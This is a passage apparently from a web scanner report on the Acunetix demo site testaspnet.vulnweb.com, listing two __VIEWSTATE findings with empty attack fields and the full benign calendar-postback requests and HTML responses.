</table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8297&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAROXRmdoIZGRk1R1WUDsTMVvB1HtaCx2ji2qDjN4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKeueDOAQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtGAX83QANsiq90jzOPhyplScnbl
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:41:02 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAROXRmdoIZGRk1R1WUDsTMVvB1HtaCx2ji2qDjN4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKeueDOAQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAtGAX83QANsiq90jzOPhyplScnbl" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:White" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8285&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAT%2BhjkNoIZGRkrPuhP0xmn1NJD7Gjras3Ct9CE38%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpmLLiCwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqmYTWs%2BNAGTvkRowDyx84N2saN5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:03 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgAAT+hjkNoIZGRkrPuhP0xmn1NJD7Gjras3Ct9CE38=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpmLLiCwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAqmYTWs+NAGTvkRowDyx84N2saN5" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:White" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td 